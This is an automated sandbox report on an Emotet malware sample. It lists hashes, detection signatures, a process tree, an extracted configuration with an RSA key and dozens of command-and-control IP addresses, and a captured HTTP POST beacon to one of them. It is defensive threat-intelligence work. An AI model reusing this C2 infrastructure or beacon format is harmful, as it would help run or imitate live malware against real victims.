Loading ...

Play interactive tourEdit tour

Windows Analysis Report NWMEaRqF7s.exe

Overview

General Information

Sample Name:NWMEaRqF7s.exe
Analysis ID:445260
MD5:0ba53dbed762655999bd37a1d8bee9db
SHA1:4566e7559e5c4287a25796ed622324a6b5b70e63
SHA256:77ed3ca0af1fec8c76e4f77114090edec76040713e53f6682151b53d79f28c79
Infos:

Most interesting Screenshot:

Detection

Emotet
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Emotet
C2 URLs / IPs found in malware configuration
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Antivirus or Machine Learning detection for unpacked file
Connects to several IPs in different countries
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • NWMEaRqF7s.exe (PID: 2944 cmdline: 'C:\Users\user\Desktop\NWMEaRqF7s.exe' MD5: 0BA53DBED762655999BD37A1D8BEE9DB)
    • dot3hc.exe (PID: 5536 cmdline: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe MD5: 0BA53DBED762655999BD37A1D8BEE9DB)
  • svchost.exe (PID: 5976 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5604 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4752 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5408 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2176 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\nQ0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\nfkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB", "C2 list": ["192.158.216.73:80", "85.214.28.226:8080", "142.44.137.67:443", "162.241.242.173:8080", "85.152.162.105:80", "62.30.7.67:443", "78.24.219.147:8080", "74.120.55.163:80", "169.239.182.217:8080", "216.208.76.186:80", "95.213.236.64:8080", "200.114.213.233:8080", "104.131.44.150:8080", "70.121.172.89:80", "75.139.38.211:80", "185.94.252.104:443", "97.82.79.83:80", "103.86.49.11:8080", "79.98.24.39:8080", "83.169.36.251:8080", "188.219.31.12:80", "74.208.45.104:8080", "137.59.187.107:8080", "174.45.13.118:80", "194.187.133.160:443", "50.81.3.113:80", "201.173.217.124:443", "139.99.158.11:443", "173.62.217.22:443", "139.130.242.43:80", "190.160.53.126:80", "137.119.36.33:80", "209.141.54.221:8080", "24.179.13.119:80", "120.150.60.189:80", "107.5.122.110:80", "121.124.124.40:7080", "203.153.216.189:7080", "157.245.99.39:8080", "85.105.205.77:8080", "173.81.218.65:80", "110.145.77.103:80", "47.144.21.12:443", "95.179.229.244:8080", "187.161.206.24:80", "46.105.131.79:8080", "189.212.199.126:443", "168.235.67.138:7080", "24.137.76.62:80", "85.66.181.138:80", "200.41.121.90:80", "5.39.91.110:7080", "104.236.246.93:8080", "172.91.208.86:80", "99.224.14.125:80", "37.139.21.175:8080", "109.74.5.95:8080", "1.221.254.82:80", "61.19.246.238:443", "5.196.74.210:8080", "67.205.85.243:8080", "79.137.83.50:443", "94.200.114.161:80", "70.180.43.7:80", "190.55.181.54:443", "47.146.117.214:80", "89.205.113.80:80", "37.187.72.193:8080", "84.39.182.7:80", "104.131.11.150:443", "139.162.108.71:8080", "87.106.136.232:8080", "153.232.188.106:80", "37.70.8.161:80", "112.185.64.233:80", "87.106.139.101:8080", "94.23.237.171:443", "24.43.99.75:80", "203.117.253.142:80", "98.109.204.230:80", "93.147.212.206:80", "91.211.88.52:7080", "139.59.60.244:8080", "176.111.60.55:8080", "180.92.239.110:8080", "62.75.141.82:80", "174.102.48.180:443"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.347473341.0000000002244000.00000004.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000001.00000002.347079722.00000000005A0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000003.00000002.615027778.00000000022D0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000003.00000002.615086404.00000000022E4000.00000004.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          1.2.NWMEaRqF7s.exe.5a052e.2.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
            1.2.NWMEaRqF7s.exe.5a23ae.3.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              1.2.NWMEaRqF7s.exe.5a23ae.3.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                3.2.dot3hc.exe.22d052e.3.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  3.2.dot3hc.exe.22d052e.3.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                    Click to see the 3 entries

                    Sigma Overview

                    No Sigma rule has matched

                    Jbx Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Antivirus / Scanner detection for submitted sampleShow sources
                    Source: NWMEaRqF7s.exeAvira: detected
                    Found malware configurationShow sources
                    Source: 3.2.dot3hc.exe.22d052e.3.unpackMalware Configuration Extractor: Emotet {"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\nQ0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\nfkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB", "C2 list": ["192.158.216.73:80", "85.214.28.226:8080", "142.44.137.67:443", "162.241.242.173:8080", "85.152.162.105:80", "62.30.7.67:443", "78.24.219.147:8080", "74.120.55.163:80", "169.239.182.217:8080", "216.208.76.186:80", "95.213.236.64:8080", "200.114.213.233:8080", "104.131.44.150:8080", "70.121.172.89:80", "75.139.38.211:80", "185.94.252.104:443", "97.82.79.83:80", "103.86.49.11:8080", "79.98.24.39:8080", "83.169.36.251:8080", "188.219.31.12:80", "74.208.45.104:8080", "137.59.187.107:8080", "174.45.13.118:80", "194.187.133.160:443", "50.81.3.113:80", "201.173.217.124:443", "139.99.158.11:443", "173.62.217.22:443", "139.130.242.43:80", "190.160.53.126:80", "137.119.36.33:80", "209.141.54.221:8080", "24.179.13.119:80", "120.150.60.189:80", "107.5.122.110:80", "121.124.124.40:7080", "203.153.216.189:7080", "157.245.99.39:8080", "85.105.205.77:8080", "173.81.218.65:80", "110.145.77.103:80", "47.144.21.12:443", "95.179.229.244:8080", "187.161.206.24:80", "46.105.131.79:8080", "189.212.199.126:443", "168.235.67.138:7080", "24.137.76.62:80", "85.66.181.138:80", "200.41.121.90:80", "5.39.91.110:7080", "104.236.246.93:8080", "172.91.208.86:80", "99.224.14.125:80", "37.139.21.175:8080", "109.74.5.95:8080", "1.221.254.82:80", "61.19.246.238:443", "5.196.74.210:8080", "67.205.85.243:8080", "79.137.83.50:443", "94.200.114.161:80", "70.180.43.7:80", "190.55.181.54:443", "47.146.117.214:80", "89.205.113.80:80", "37.187.72.193:8080", "84.39.182.7:80", "104.131.11.150:443", "139.162.108.71:8080", "87.106.136.232:8080", "153.232.188.106:80", "37.70.8.161:80", "112.185.64.233:80", "87.106.139.101:8080", "94.23.237.171:443", "24.43.99.75:80", "203.117.253.142:80", "98.109.204.230:80", "93.147.212.206:80", "91.211.88.52:7080", "139.59.60.244:8080", "176.111.60.55:8080", "180.92.239.110:8080", "62.75.141.82:80", "174.102.48.180:443"]}
                    Multi AV Scanner detection for submitted fileShow sources
                    Source: NWMEaRqF7s.exeVirustotal: Detection: 84%Perma Link
                    Source: NWMEaRqF7s.exeMetadefender: Detection: 68%Perma Link
                    Source: NWMEaRqF7s.exeReversingLabs: Detection: 92%
                    Source: 3.2.dot3hc.exe.22d052e.3.unpackAvira: Label: TR/Crypt.XPACK.Gen2
                    Source: 1.2.NWMEaRqF7s.exe.5a052e.2.unpackAvira: Label: TR/Crypt.XPACK.Gen2
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: 3_2_02301DEC CryptDecodeObjectEx,3_2_02301DEC
                    Source: NWMEaRqF7s.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: 1_2_00410555 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,1_2_00410555
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: 1_2_022528FB FindFirstFileW,FindNextFileW,FindClose,1_2_022528FB
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: 3_2_00410555 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,3_2_00410555
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: 3_2_023028FB FindFirstFileW,FindNextFileW,FindClose,3_2_023028FB

                    Networking:

                    barindex
                    C2 URLs / IPs found in malware configurationShow sources
                    Source: Malware configuration extractorIPs: 192.158.216.73:80
                    Source: Malware configuration extractorIPs: 85.214.28.226:8080
                    Source: Malware configuration extractorIPs: 142.44.137.67:443
                    Source: Malware configuration extractorIPs: 162.241.242.173:8080
                    Source: Malware configuration extractorIPs: 85.152.162.105:80
                    Source: Malware configuration extractorIPs: 62.30.7.67:443
                    Source: Malware configuration extractorIPs: 78.24.219.147:8080
                    Source: Malware configuration extractorIPs: 74.120.55.163:80
                    Source: Malware configuration extractorIPs: 169.239.182.217:8080
                    Source: Malware configuration extractorIPs: 216.208.76.186:80
                    Source: Malware configuration extractorIPs: 95.213.236.64:8080
                    Source: Malware configuration extractorIPs: 200.114.213.233:8080
                    Source: Malware configuration extractorIPs: 104.131.44.150:8080
                    Source: Malware configuration extractorIPs: 70.121.172.89:80
                    Source: Malware configuration extractorIPs: 75.139.38.211:80
                    Source: Malware configuration extractorIPs: 185.94.252.104:443
                    Source: Malware configuration extractorIPs: 97.82.79.83:80
                    Source: Malware configuration extractorIPs: 103.86.49.11:8080
                    Source: Malware configuration extractorIPs: 79.98.24.39:8080
                    Source: Malware configuration extractorIPs: 83.169.36.251:8080
                    Source: Malware configuration extractorIPs: 188.219.31.12:80
                    Source: Malware configuration extractorIPs: 74.208.45.104:8080
                    Source: Malware configuration extractorIPs: 137.59.187.107:8080
                    Source: Malware configuration extractorIPs: 174.45.13.118:80
                    Source: Malware configuration extractorIPs: 194.187.133.160:443
                    Source: Malware configuration extractorIPs: 50.81.3.113:80
                    Source: Malware configuration extractorIPs: 201.173.217.124:443
                    Source: Malware configuration extractorIPs: 139.99.158.11:443
                    Source: Malware configuration extractorIPs: 173.62.217.22:443
                    Source: Malware configuration extractorIPs: 139.130.242.43:80
                    Source: Malware configuration extractorIPs: 190.160.53.126:80
                    Source: Malware configuration extractorIPs: 137.119.36.33:80
                    Source: Malware configuration extractorIPs: 209.141.54.221:8080
                    Source: Malware configuration extractorIPs: 24.179.13.119:80
                    Source: Malware configuration extractorIPs: 120.150.60.189:80
                    Source: Malware configuration extractorIPs: 107.5.122.110:80
                    Source: Malware configuration extractorIPs: 121.124.124.40:7080
                    Source: Malware configuration extractorIPs: 203.153.216.189:7080
                    Source: Malware configuration extractorIPs: 157.245.99.39:8080
                    Source: Malware configuration extractorIPs: 85.105.205.77:8080
                    Source: Malware configuration extractorIPs: 173.81.218.65:80
                    Source: Malware configuration extractorIPs: 110.145.77.103:80
                    Source: Malware configuration extractorIPs: 47.144.21.12:443
                    Source: Malware configuration extractorIPs: 95.179.229.244:8080
                    Source: Malware configuration extractorIPs: 187.161.206.24:80
                    Source: Malware configuration extractorIPs: 46.105.131.79:8080
                    Source: Malware configuration extractorIPs: 189.212.199.126:443
                    Source: Malware configuration extractorIPs: 168.235.67.138:7080
                    Source: Malware configuration extractorIPs: 24.137.76.62:80
                    Source: Malware configuration extractorIPs: 85.66.181.138:80
                    Source: Malware configuration extractorIPs: 200.41.121.90:80
                    Source: Malware configuration extractorIPs: 5.39.91.110:7080
                    Source: Malware configuration extractorIPs: 104.236.246.93:8080
                    Source: Malware configuration extractorIPs: 172.91.208.86:80
                    Source: Malware configuration extractorIPs: 99.224.14.125:80
                    Source: Malware configuration extractorIPs: 37.139.21.175:8080
                    Source: Malware configuration extractorIPs: 109.74.5.95:8080
                    Source: Malware configuration extractorIPs: 1.221.254.82:80
                    Source: Malware configuration extractorIPs: 61.19.246.238:443
                    Source: Malware configuration extractorIPs: 5.196.74.210:8080
                    Source: Malware configuration extractorIPs: 67.205.85.243:8080
                    Source: Malware configuration extractorIPs: 79.137.83.50:443
                    Source: Malware configuration extractorIPs: 94.200.114.161:80
                    Source: Malware configuration extractorIPs: 70.180.43.7:80
                    Source: Malware configuration extractorIPs: 190.55.181.54:443
                    Source: Malware configuration extractorIPs: 47.146.117.214:80
                    Source: Malware configuration extractorIPs: 89.205.113.80:80
                    Source: Malware configuration extractorIPs: 37.187.72.193:8080
                    Source: Malware configuration extractorIPs: 84.39.182.7:80
                    Source: Malware configuration extractorIPs: 104.131.11.150:443
                    Source: Malware configuration extractorIPs: 139.162.108.71:8080
                    Source: Malware configuration extractorIPs: 87.106.136.232:8080
                    Source: Malware configuration extractorIPs: 153.232.188.106:80
                    Source: Malware configuration extractorIPs: 37.70.8.161:80
                    Source: Malware configuration extractorIPs: 112.185.64.233:80
                    Source: Malware configuration extractorIPs: 87.106.139.101:8080
                    Source: Malware configuration extractorIPs: 94.23.237.171:443
                    Source: Malware configuration extractorIPs: 24.43.99.75:80
                    Source: Malware configuration extractorIPs: 203.117.253.142:80
                    Source: Malware configuration extractorIPs: 98.109.204.230:80
                    Source: Malware configuration extractorIPs: 93.147.212.206:80
                    Source: Malware configuration extractorIPs: 91.211.88.52:7080
                    Source: Malware configuration extractorIPs: 139.59.60.244:8080
                    Source: Malware configuration extractorIPs: 176.111.60.55:8080
                    Source: Malware configuration extractorIPs: 180.92.239.110:8080
                    Source: Malware configuration extractorIPs: 62.75.141.82:80
                    Source: Malware configuration extractorIPs: 174.102.48.180:443
                    Source: unknownNetwork traffic detected: IP country count 30
                    Source: global trafficTCP traffic: 192.168.2.6:49730 -> 85.214.28.226:8080
                    Source: global trafficTCP traffic: 192.168.2.6:49732 -> 162.241.242.173:8080
                    Source: global trafficTCP traffic: 192.168.2.6:49760 -> 78.24.219.147:8080
                    Source: Joe Sandbox ViewIP Address: 94.200.114.161 94.200.114.161
                    Source: Joe Sandbox ViewIP Address: 139.99.158.11 139.99.158.11
                    Source: Joe Sandbox ViewIP Address: 85.214.28.226 85.214.28.226
                    Source: Joe Sandbox ViewIP Address: 85.214.28.226 85.214.28.226
                    Source: Joe Sandbox ViewASN Name: ROGERS-COMMUNICATIONSCA ROGERS-COMMUNICATIONSCA
                    Source: Joe Sandbox ViewASN Name: STARHUB-MOBILEStarHubLtdSG STARHUB-MOBILEStarHubLtdSG
                    Source: Joe Sandbox ViewASN Name: DU-AS1AE DU-AS1AE
                    Source: global trafficHTTP traffic detected: POST /DLgjaT02V4ZRh7a7A/wt8CBtC1NZfAQWkn/ HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------80lhrKDVYliktvcpjgmL9User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 142.44.137.67:443Content-Length: 4612Connection: Keep-AliveCache-Control: no-cache
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.158.216.73
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.158.216.73
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.158.216.73
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.214.28.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.214.28.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.214.28.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 142.44.137.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 142.44.137.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 142.44.137.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 142.44.137.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 142.44.137.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 142.44.137.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 142.44.137.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 162.241.242.173
                    Source: unknownTCP traffic detected without corresponding DNS query: 162.241.242.173
                    Source: unknownTCP traffic detected without corresponding DNS query: 162.241.242.173
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.152.162.105
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.152.162.105
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.152.162.105
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.30.7.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.30.7.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.30.7.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.24.219.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.24.219.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.24.219.147
                    Source: svchost.exe, 0000000C.00000002.470826359.0000017DE74EC000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotif equals www.facebook.com (Facebook)
                    Source: svchost.exe, 0000000C.00000002.470826359.0000017DE74EC000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotif equals www.twitter.com (Twitter)
                    Source: svchost.exe, 0000000C.00000002.471604595.0000017DE7D15000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-07-07T08:53:08.3402540Z||.||e614b8f2-4086-47b8-a8db-bfa82598f22f||1152921505693648129||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                    Source: svchost.exe, 0000000C.00000002.471604595.0000017DE7D15000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-07-07T08:53:08.3402540Z||.||e614b8f2-4086-47b8-a8db-bfa82598f22f||1152921505693648129||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                    Source: svchost.exe, 0000000C.00000003.449149844.0000017DE7DA0000.00000004.00000001.sdmpString found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1",